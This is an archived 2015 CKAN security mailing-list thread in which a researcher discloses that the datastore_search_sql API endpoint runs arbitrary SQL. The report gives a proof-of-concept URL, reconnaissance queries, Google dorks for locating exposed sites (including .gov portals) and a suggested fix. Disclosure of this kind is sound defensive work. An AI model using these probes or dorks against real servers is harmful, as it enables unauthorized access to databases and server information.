[CKAN-Security] Fwd: security vulnerability in CKAN
Adrià Mercader
adria.mercader at okfn.org
Mon Mar 2 10:28:00 UTC 2015
Thanks Michael,
We'll discuss the issue and come back to you.
Adrià
On 2 March 2015 at 08:18, Matt Moore <matt.moore at okfn.org> wrote:
>
> ---------- Forwarded message ----------
> From: dophine britanico <dophine at gmail.com>
> Date: 2 March 2015 at 07:48
> Subject: Re: security vulnerability in CKAN
> To: Matt Moore <matt.moore at okfn.org>
>
>
> Hi,
>
> Thank you I believe in responsible security disclosure so I contacted you
> here is what i found while auditing our CKAN server.
>
> vulnerability: CKAN API
>
> URL: http://demo.ckan.org/api/action/datastore_search_sql
> SQL injection points: ?sql=INJECT HERE
>
> To replicate:
> Install JSON View plugin for firefox or chrome
>
> POC:
> http://demo.ckan.org/api/action/datastore_search_sql?sql=SELECT%20inet_server_addr%28%29;
>
> Sample: SQL
> SELECT current_database()
> SELECT current_user;
> SELECT inet_server_addr();
> SELECT version()
>
> Vulnerable URL will returned sensitive information, Persistent attacker will
> use and escalate this to a total server compromise.
>
> Google dork:
> inurl:datastore_search_sql
>
> This can be also directly fingerprinted and replicated to any website using
> CKAN.
>
> Vulnerable as well is US data portal www.data.gov, in which I have also
> contacted them in case respond from yours is delayed
>
> site:.gov datastore_search_sql
>
> Suggested Fix:
> Sanitize or remove 'sql' input paramater from datastore_search_sql
> Remove api_info.html?resource_id sample query sample from default install
>
>
> Sincerely,
> Michael Britanico
>
>
>
>
>
>
>
>
> On Mon, Mar 2, 2015 at 3:27 PM, Matt Moore <matt.moore at okfn.org> wrote:
>>
>> Dophine,
>>
>> If you could provide us with some information, then we can look into the
>> vulnerability. I've mentioned this to our development team, but without
>> some information, there's not much we can do.
>>
>> Thanks,
>>
>> Matthew Moore
>>
>> On 2 March 2015 at 06:13, dophine britanico <dophine at gmail.com> wrote:
>>>
>>> Hello,
>>>
>>> I would like to inform you of a remote and serious vulnerability in the
>>> default and recent version of CKAN and probably all recent versions of CKAN.
>>>
>>> Please contact me anytime.
>>>
>>> Dophine "Michael" Britanico
>>> Security Researcher
>>> (+63) 9151100672
>>>
>>
>>
>>
>> --
>> Matthew Moore
>> Sysadmin
>> Open Knowledge - www.okfn.org
>> Skype - notmatt
>
>
>
>
>
> --
> Matthew Moore
> Sysadmin
> Open Knowledge - www.okfn.org
> Skype - notmatt
>
> _______________________________________________
> CKAN security
> https://lists.okfn.org/mailman/listinfo/security
> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>
> Repo: https://github.com/ckan/ckan-security
More information about the Security
mailing list